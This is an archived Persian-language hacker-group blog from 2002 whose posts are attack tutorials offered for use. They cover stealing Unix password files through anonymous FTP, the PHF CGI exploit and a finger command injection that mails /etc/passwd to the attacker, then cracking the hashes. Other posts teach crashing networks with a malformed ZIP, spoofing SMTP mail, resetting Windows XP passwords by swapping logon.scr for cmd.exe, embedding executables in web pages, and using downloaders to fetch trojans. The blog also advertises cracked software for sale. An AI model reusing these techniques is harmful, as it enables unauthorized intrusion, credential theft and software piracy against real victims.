.:. .:. HACK BOYS .:. .:.

ها ها ها

Domain name: persianblog.ir

Name servers:
dns1.persiawebcity.com
dns3.persiawebcity.com

Creation date: 04/29/02 13:22:58
Expiration date: 04/29/04 13:22:58

Registrant Contact:
NA
NA persianblog (NA)
NA
*
Tehran, Tehran B987EG
Tehran, TEHRAN B987EG
IR


Administrative Contact:
NA
behrang behrang (behrang79@yahoo.com)
44-01527542121
*
Tehran, Tehran B987EG
Tehran, TEHRAN B987EG
IR


Billing Contact:
NA
NA persianblog (NA)
NA
*
Tehran, Tehran B987EG
Tehran, TEHRAN B987EG
IR


Technical Contact:
NA
GOBIGMEDIA TECHSERVICES (domains@gobigmedia.com)
416-366-1310
FAX: 416-366-2744
149 CHURCH STREET
TORONTO, ON M5B1Y4
TORONTO, ON M5B1Y4
CAStatus: PROTECTED
Note: To help prevent malicious domain hijacking and domain
transfer errors, the registrar has protected the registrant
of this domain name registrant by locking it. Any attempted
transfers will be denied at the registry until the registrant
requests otherwise. The registrant for the name may unlock
the name at any time at the current registrar in order for
a transfer initiation to succeed

953ms
Scrolling MessageonLoad="timerONE=window.setTimeout('scrollit(100)',500)">اينم پرشين ديگه چی عزيزم
+ احسان شیطون ; ۱۱:٢۸ ‎ب.ظ ; یکشنبه ٢۸ مهر ،۱۳۸۱
comment نظرات ()

http://hamedanian-hackers.150m.com

آيا ميدانستيد با ارسال يك فايل ZIPبه راحتي ميتوانيد اكثر شبكهها را از كار انداخته و باعث هنگ شدن آنها بشويد؟


اين كار بسيار ساده است ابتدا دو يا چند فايل را توسط PKZIPفشرده ساخته و سپس فايل ZIPحاصله را بـا يك متن نگـار هگـزا (HEX)مـورد ويرايش قـرار داده و نام دو فايل آن را يكي كنيد .حال كافي است تا اين فايل ZIPراارسال كرده تاباعث از كارافتادن بلافاصله شبكه شويد.


اما چگونه اين امر ميسر ميشود؟
بسيار ساده، هنگامي كه شما فايل zipشدهاي را ارسال ميكنيد خـود نـرمافـزار شبكه اين فايل را بلافاطله جهت پــردازش و دستــرسي فايل FILE_ID.DIZاقدام به بازگشايي از حالت فشرده ميكند.
اين كار معمـولا و تقــريبا در همه شبكهها با استفاده از PKUNZIP صورت ميگيــرد حال هنگامي كه PKUNZIPفايل اول را بازكــرد وقتي كه اقـدام به بازكــردن فايل دوم با همان نـام ميكنـد، متـوجه از قبـل موجود بودن آن فايل گشته و طي پيغامي از اپـراتور ميپــرسد كه فايل از قبل موجود است آيا رونويسي شود؟ و تا كسي به داد بـرنامه نــرسد و سوالش را پاسخ ندهد شبكه به همان منوال باقي خواهد ماند.


بابا اين همدانی ها را دست کم نگيريد
+ احسان شیطون ; ٩:٥٤ ‎ق.ظ ; یکشنبه ٢۸ مهر ،۱۳۸۱
comment نظرات ()

 

Unixيكي از سرورهايي است كه در جهان بسيار از آن استفاده مي شود در ايران و در مشهد خودمان هم ISPهايي وجود دارند كه سرور آن ها Unixباشند .بنابر اين شما مي توانيد براي هك آن ها از اين راه ها استفاده كنيد شما در اين راه احتمالا با مشكلات زيادي برخورد خواهيد كرد .من راه كامل و بي عيبي را در اختيار شما نمي گذارم براي هكر شدن بايد تلاش بسياري كرد و اين اشاره اي است كه شما را به طرف راه درست هدايت مي كند .براي هك يونيكس از اين طريق عمل مي كنند كه با روش هايي كه ذكر خواهد شد فايل حاوي Passwordها و IDها را كه به نام Passwdمي باشد دريافت كنند .اين فايل يك فايل متني است كه در آن اطلاعات بصورت رمز در آمده .وقتي شكا يك فايل Passwdرا باز كنيد چنين نوشته هايي را
مي بينيد .كه بايد آن را از حالت رمز در آورد .

root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
Taha:3A62i9qr:1012:10:Mashhad


در اينجا مثلا Tahaنام IDو 3a62...كلمهي عبور اما به صورت رمز در آمده مي باشد .
شايد فايل به شكل زير هم باشد .اما اين فايل كار را غيرممكنمي سازد.در صورتي كه به شكل زير باشد يعني در آن علامت *به جاي كلمه ي به رمز آمده به آن ها Shadowedگفته مي شود .

root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
Taha:*:1012:10:mashhad BFH:/home/user/Taha:/usr/local/bin/tcsh

ما فعلا مي خواهيم اين فايل را دريافت كنيم .اولين قدم اين است كه آيدي در آن ISPبراي خود دست و پا كنيم .حالا اين آيدي مي تواند متعلق به دوستمان باشد و يا يك آشناي دور .پيدا كردن رمز دوست شما به سادگي ميسر است كه در نامه هاي قبلي توضيح داده شده .بعد از پيدا كردن رمز شما با آيدي دوستتان به شبكه Connectشويد .اين اتصال مي تواند يك اتصال به طريق Modem DialUp Connectionباشد .بعد از اتصال كامل وارد قسمت MS-DOS Promptشويد و فرمان زير را وارد كنيد

FTP http://www.domain.com/

كه Domainآدرس سرور ISPمي باشد سپس از شما خواسته مي شود تا آيدي خود را وارد كنيد كلمه ي Anonymousرا بزنيد .سپس وقتي درخواست كلمه عبور شد كليد Enterرا بزنيد .اگر وارد سيستم شديد موفق شده ايد در غير اين صورت جمله ي login failedدريافت مي شود .دوباره امتحان كنيد و اين بار در كادر Passwordآدرس Emailاي را وارد كنيد .اگر اين بار هم جواب نداد به جاي كلمه ي anonymousاز Userخود يعني دوستتان استفاده كنيد . احتمال دارد اين بار هم موفق نشويد .اين دفعه روش هاي فوق را براي دستور زير امتحان كنيد

FTP ftp.domain.com

اگر اين بار هم جوابي نگرفتيد با ISPتماس گرفته و سوال كنيد كه چگونه مي توانم از سرور FTPخود شما استفاده كنم چون وارد سيتمتان نمي شود اگر پرسيد براي چه مي خواهيد وارد شويد بگوييد مي خواهم از نرم افزار هاي آن استفاده كنم ولي مواظب باشيد كه نام خود را نگوييد .خلاصه تمام تلاش خود را براي فهميدن روش دستيابي به سيستم بكنيد اگر توانستيد وارد سيستم شويد به راحتي مي توانيد وارد شاخه ي مشخصي رفته و فايل Passwdها را بگيريد ولي احتمال دارد كه آن شاخه براي شما قفل شده باشد .براي كار با FTPبايد دستورات FTPرا ياد داشته باشيد .براي لسيت دستورات مي توانيد ?را تايپ كنيد .ابتدا به شاخه ي ETCبرويد مي توانيد فايل passwdرا در آنجا پيدا كنيد .اين فايل را بگيريد .اگر در آنجا نبود شاخه هاي ديگر را امتحان كنيد .ولي به احتمال زياد همانجاست .حال اگر اصلا نتوانستيد وارد FTPشويد مي توانيد اين فايل را با استفاده از قايلبيت PHFبگيريد .به اين صورت كه در Internet Browserخود آدرس زير را وارد كنيد .

http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd

اگر به اين صورت هم نتوانستيد آن را بگيريد مي توانيد از طريق Fingerاين كار را انجام دهيد .اين روش به شرطي جواب مي دهد كه Serverمورد نظر قابليت Fingerرا داشته باشد .به آدرس زير مراجعه كنيد .

www.domain.com/cgi-bin/finger

اگر اين آدرس كار نكند ديگر هيچ اميدي نيست اما اگر كار كند كادري جلوي شما ظاهر مي شود كه مي خواهد نام مورد نظر خود را بدهيد .آدرس زير را وارد كنيد .

ID@domain.com ; /bin/mail you@somewhere.com < etc/passwd

كه در اين آدرس IDشناسه كاربري يك شخص است كه مثلا مي توانيد از آيدي دوستتان استفاده كنيد domain.comآدرس نام حوزه ي ISPاست و آدرس you@somewhere.comآدرس Emailشماست مثلا اين يك نمونه است .

bfh@internet.com ; /bin/mail taha_bazri@yahoo.com < etc/passwd

با وارد كردن اين دستور فايل Passwdبراي من به آدرس Taha_bazri@yahoo.com
پست مي شود !

خوب حالا تا الان اگر توانسته ايد فايل را گرفته باشيد كه بهتر در غير اينصورت بايد بي خيال اين روش شويد .
حالا اگر فايل shadowedگير آورديد بقيه ي متن را نخوانيد چون كمكي به شما نمي كند و بايد از روش هاي ديگري استفاده كرد .اما اگر يك فايل مثل نمونهي اولي كه در بالا بود گير آورديد مي توانيد كار خود را ادامه دهيد حالا شما نياز به يك برنامه ي Unix Password Crackerداريد معروف ترين اين نوع برنامه ها John Ripperو Cracker Jackمي باشد .اما John Ripper سريعترين نوع اين برنامه مي باشد .اين دو برنامه را مي توانيد از همان آدرس قبلي يعني www.hackersclub.com/km/frontpageبه دست بياوريد اما نمونه ي ديگري از اين نمونه برنامه ها به كتابخانه هك به نام jill_v20 ارسال شد .با استفاده از اين برنامه ها مي توانيد به هدف خود برسيد .


اينم از دوست همدانی مااينجا
+ احسان شیطون ; ٩:٤٩ ‎ق.ظ ; یکشنبه ٢۸ مهر ،۱۳۸۱
comment نظرات ()

 

سلام

امشب با شریکم علی هکرصحبت کردیم و اعضا مورد نیاز رالیست برداری کردیم
ما این اعضا
را می خوایم

یک نفر مسلط به ++C
یک نفر مسلط بهDelfi
یک نفر مسلط بهasmbelly
یک نفر مسلط بهflash
یک نفر مسلط بهtroja
یک نفر مسلط بهpascall
یک نفر مسلط بهjava script
یک نفر مسلط بهHTML
+ احسان شیطون ; ۱۱:٤۱ ‎ب.ظ ; شنبه ٢٧ مهر ،۱۳۸۱
comment نظرات ()

 

اینن هم سورس قسمتی ساب سون 80 قفله
Tag = 240
Left = 274
Top = 290
BorderStyle = bsNone
Caption = ' '
ClientHeight = 255
ClientWidth = 251
Color = clBlack
Font.Charset = DEFAULT_CHARSET
Font.Color = clWindowText
Font.Height = -11
Font.Name = 'MS Sans Serif'
Font.Style = []
OldCreateOrder = False
Position = poDesktopCenter
OnCreate = FormCreate
OnHide = FormHide
PixelsPerInch = 96
TextHeight = 13
object SubForm1: TSubForm
Left = 0
Top = 0
Width = 251
Height = 255
CanResize = False
AddIT = False
Title = ' '
end
object Label1: TLabel
Left = 8
Top = 28
Width = 237
Height = 13
Alignment = taCenter
AutoSize = False
Caption = ' add email notification: '
Font.Charset = DEFAULT_CHARSET
Font.Color = clRed
Font.Height = -11
Font.Name = 'MS Sans Serif'
Font.Style = [fsUnderline]
ParentFont = False
end
object Label2: TLabel
Left = 8
Top = 52
Width = 69
Height = 93
Alignment = taRightJustify
AutoSize = False
Caption = 'destination:'#13#10' '#13#10'email data:'
Font.Charset = DEFAULT_CHARSET
Font.Color = 33023
Font.Height = -11
Font.Name = 'MS Sans Serif'
Font.Style = []
ParentFont = False
end
object OutlookBtn1: TOutlookBtn
Left = 12
Top = 224
Width = 69
Height = 22
OnClick = OutlookBtn1Click
Checked = False
Style = bsMSOffice
Caption = 'add'
end
object OutlookBtn2: TOutlookBtn
Left = 88
Top = 224
Width = 73
Height = 22
OnClick = OutlookBtn2Click
Checked = False
Style = bsMSOffice
Caption = 'cancel'
end
object OutlookBtn3: TOutlookBtn
Left = 168
Top = 224
Width = 69
Height = 22
OnClick = OutlookBtn3Click
Checked = False
Style = bsMSOffice
Caption = 'help'
end
object FlatEdit1: TFlatEdit
Left = 240
Top = 50
Width = 157
Height = 19
ColorFlat = clBlack
ParentColor = True
TabOrder = 0
Visible = False
end
object FlatEdit2: TFlatEdit
Left = 240
Top = 76
Width = 157
Height = 19
ColorFlat = clBlack
ParentColor = True
TabOrder = 1
Visible = False
end
object FlatEdit3: TFlatEdit
Left = 80
Top = 50
Width = 157
Height = 19
ColorFlat = clBlack
ParentColor = True
TabOrder = 2
end
object Memo1: TMemo
Left = 80
Top = 72
Width = 157
Height = 145
BorderStyle = bsNone
ScrollBars = ssVertical
TabOrder = 3
end
end
حال کی میتونه ساب سون را سورس کنه
اينا کار همکار عزيزم علی نويين (بد بوی)
http://badboy.persianblog.ir
+ احسان شیطون ; ۸:٠٧ ‎ق.ظ ; شنبه ٢٠ مهر ،۱۳۸۱
comment نظرات ()

 


mitoonid drive C ro bebinidinam az drive D shoma+ احسان شیطون ; ۱٢:۳۸ ‎ق.ظ ; یکشنبه ۱٤ مهر ،۱۳۸۱

 

نيم نگاهي درباره اين موضوع :

SMTP يك پروتوكل است كه اينترنت از طريق آن مي تواند ايميل ارسال كند . SMTP سرورها از اين پروتكول جهت ارتباط با سرورهاي ديگر استفاده مي نمايد و توسط تل نت كردن يك دايركتوري به يك ميل سرور و روش ارسال دستي . يك شخص به آساني مي تواند يك ايميل با آدرس دلخواه به ديگران بفرستد و يا به معني ديگر يك ايميل ناشناس مي فرستد كه توسط هيچ كس فرستنده نامه قابل دسترسي نيست ...


حالا جهت انجام اين كار به چه چيزهايي احتياج دارم ؟


تنها چيزي كه احتياج داريد فقط يك Telnet Client عمومي است و اين را بايد بدانيد SMTP جهت اين كارها ساخته نشده اند و بايد همه چيز را به خوبي انجام دهيد ...


چگونه بايد شروع كنم ؟


ابتدا تل نت را بر روي آدرس SMTP سرور دلخواه خودتان با پورت 25 تنظيم نماييد و بعد از انجام اين كار سرور بايد با يك پيغام عمومي پاسخ دهد و بعد از وصل شدن به SMTP سرور بايد اين چيزها را تايپ نماييد :


Helo ( SMTP Domain ) u


Mail From: k


RCPT TO:


Data ( YourMessege )h


...

مثال :

OK
HELO faker.com
Hello faker.com (faker.com), pleased to meet you
MAIL FROM:
... Sender ok
RCPT TO:
... Recipient ok
DATA
Enter mail, end with "." on a line by itself
from:satan
subject:Lamer
This is the body of my message.
.
Mail accepted
QUIT
OK

+ احسان شیطون ; ۱٢:۳۸ ‎ق.ظ ; یکشنبه ۱٤ مهر ،۱۳۸۱

 

بوت در ياهو مسنجر چيست و چرا بوت مي شويم ؟
بوت يك سري كدها كه معمولا شبيه به زبان جاوا اسكريپت و با اچ تي ام ال هسنتد و هنگامي كه اين كدها وارد مي شود

باعث ايجاد يك سري وقفه در YPager.exe و منابع سيستم عامل مي شود و در نتيجه يا سيستم هنگ مي كند و يا ياهو


مسنجر بسته مي شود ...


چرا بوت مي شويم ؟


ياهو به علت اينكه سرعت ياهو مسجر را به علت كاربران زياد بالا ببرد يك سري پروتكول ها را آزاد نمود و به همين دليل


خيلي از افراد هكر از اين جهت استفاده نموده و باعث اختلالات در سيستم مي شوند ...
+ احسان شیطون ; ۱٢:۳٧ ‎ق.ظ ; یکشنبه ۱٤ مهر ،۱۳۸۱

 

بوت در ياهو مسنجر چيست و چرا بوت مي شويم ؟
بوت يك سري كدها كه معمولا شبيه به زبان جاوا اسكريپت و با اچ تي ام ال هسنتد و هنگامي كه اين كدها وارد مي شود

باعث ايجاد يك سري وقفه در YPager.exe و منابع سيستم عامل مي شود و در نتيجه يا سيستم هنگ مي كند و يا ياهو


مسنجر بسته مي شود ...


چرا بوت مي شويم ؟


ياهو به علت اينكه سرعت ياهو مسجر را به علت كاربران زياد بالا ببرد يك سري پروتكول ها را آزاد نمود و به همين دليل


خيلي از افراد هكر از اين جهت استفاده نموده و باعث اختلالات در سيستم مي شوند ...
+ احسان شیطون ; ۱٢:۳٧ ‎ق.ظ ; یکشنبه ۱٤ مهر ،۱۳۸۱

 

بوت در ياهو مسنجر چيست و چرا بوت مي شويم ؟
بوت يك سري كدها كه معمولا شبيه به زبان جاوا اسكريپت و با اچ تي ام ال هسنتد و هنگامي كه اين كدها وارد مي شود

باعث ايجاد يك سري وقفه در YPager.exe و منابع سيستم عامل مي شود و در نتيجه يا سيستم هنگ مي كند و يا ياهو


مسنجر بسته مي شود ...


چرا بوت مي شويم ؟


ياهو به علت اينكه سرعت ياهو مسجر را به علت كاربران زياد بالا ببرد يك سري پروتكول ها را آزاد نمود و به همين دليل


خيلي از افراد هكر از اين جهت استفاده نموده و باعث اختلالات در سيستم مي شوند ...
+ احسان شیطون ; ۱٢:۳٧ ‎ق.ظ ; یکشنبه ۱٤ مهر ،۱۳۸۱

 

نامه نگار كراك شد
اين نرم افزار كه يكي از قوي ترين نرم افزارهاي خوشنويسي كامپيوتري

مي باشد و توسط قفل سخت افزاري محافظت شده است پس از تلاش


بسيار قفل شكسته شد و اين نرم افزار كه قيمت اصلي آن حدود 100 هزار


تومان ميباشد توسط گروه ما به قيمت 20000 تومان بر روي سي دي عزضه


مي گردد از كساني كه مايل به خريد آن مي باشند بر روي لينك زير كليك


كنند

+ احسان شیطون ; ۱٢:۳٧ ‎ق.ظ ; یکشنبه ۱٤ مهر ،۱۳۸۱

 

نحوه هک کلمه عبور ویندوز XP اگر شما یک کاربر محدود شده هستید ...
ابتدا صفحه داس را در ویندوز باز کنید و این کدها را دقیقا وارد نمایید :

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos


بعد سیستم را Restart کنید و هنگامی که سیستم بالا می آید دیگر همراه با صفحه ورود قبلا همراه نیست و وارد صفحه داس بدون محدودیت شده است . خوب حالا این دستور را وارد کنید :


"net user password"


برای مثال اگر مدیر ویندوز شما یک اسم کاربری به نام Frank دارد و شما می خواهید کلمه عبورش به


1234 تغییر یابد این گونه عمل می نماییم
+ احسان شیطون ; ۱٢:۳٦ ‎ق.ظ ; یکشنبه ۱٤ مهر ،۱۳۸۱

 

نحوه تغيير كد اصلي ويندوز اكس پي بدون نصب دوباره آن :

برنامه REGEDIT را از منوي Run اجرا كنيد و سپس به اين مسير برويد :


HKey_Local_Machine\Software\Microsoft\WindowsNT\Current Version\WPAEvents


سپس در پانل سمت راست روي " oobetimer " كليك كنيد و سپس يكي از كوچكترين رقم اين value را تغيير دهيد . سپس از


اين برنامه خارج شويد و اين در منوي RUN اين دستور را وارد كنيد :


%systemroot%\system32\oobe\msoobe.exe /a


تا صفحه اكتيوشن باز شود و سپس روي اكتيو توسط تلفن كليك كنيد و سپس NEXT بزنيد سپس در صفحه جديد روي


Change Product Key كليك كنيد و يك كد تازه وارد كنيد . در شمن شما نمي توانيد كليد FCKGW را دوباره وارد كنيد .


خوب حالا دوي Update كليك نكنيد و سيستم را حالا رستارت كنيد و وقتي دوباره بالا آمد كد بالايي را دوباره در منوي RUN


وارد كنيد و همان كارهايي كه در مرحله قبلي گقته شد دوباره تكرار كنيد ...


و حالا بعد از آن بايد شما Windows Is Already Actived را ببينيد و حلا كارها تمام شده است !


+ احسان شیطون ; ۱٢:۳٦ ‎ق.ظ ; یکشنبه ۱٤ مهر ،۱۳۸۱

 

نحوه قرار دادن فايل EXE در صفحات وب‌ :

به علت اينكه اين روش به صورت دستي زمان زيادي را به كار مي برد اين برنامه را در سايت قرار داديم تا به راحتي بتوانيد


اين كار را انجام دهيد ... بايد توجه داشته باشيد كه اين روش فقط در اينترنت اكسپلورر پنج و پنچ نيم عمل مي كند و در شش


امكان پذير نيست و فايلي كه شما مي خواهيد قرار دهيد از نبايد از سي كيلو بايت بيشتر باشد ...


ابتدا برنامه را اجرا كنيد و در Browse فايل مورد نظر را انتخاب كنيد و سپس بر روي Encode كليك نماييد و بعد از چند لحظه بر


روي Create كليك نماييد تا فايل مورد نظر ساخته شود . حال مي توانيد اين فايل كه داراي پسوند mhtml. است را به صورت


فرام در وب سايتتان قرار دهيد و از آن استفاده كنيد !
نظرات

+ احسان شیطون ; ۱٢:۳٦ ‎ق.ظ ; یکشنبه ۱٤ مهر ،۱۳۸۱

 

برنامه هاي Web Downloader چيستند‌ ؟
هنگامي كه ما به اين برنامه ها پارامتر مي دهيم يك تروجان بزرگ را كه خودمان روي وب سايت قرار داده ايم دان لود مي كند

و بعد از آن روي كامپيوتر شخص مورد نظر اجرا مي كند ! من يك مثال را برايتان مي آورم :


بعنوان مثال اين يك برنامه وب دان لودر است ..


Web Downloader 1.0 Example


URL : http://www.mysite.com/file.exe


اگر دقت كنيد اكثر سرور تروجان ها 100 كيلو بايت است كه حجم زيادي دارد اين جور برنامه يك فايل حدود 2 كيلو بايتي درست


مي كنند كه در صورت اجرا يك تروجان 100 كيلو بايتي را دان لود مي كنند !
+ احسان شیطون ; ۱٢:۳٦ ‎ق.ظ ; یکشنبه ۱٤ مهر ،۱۳۸۱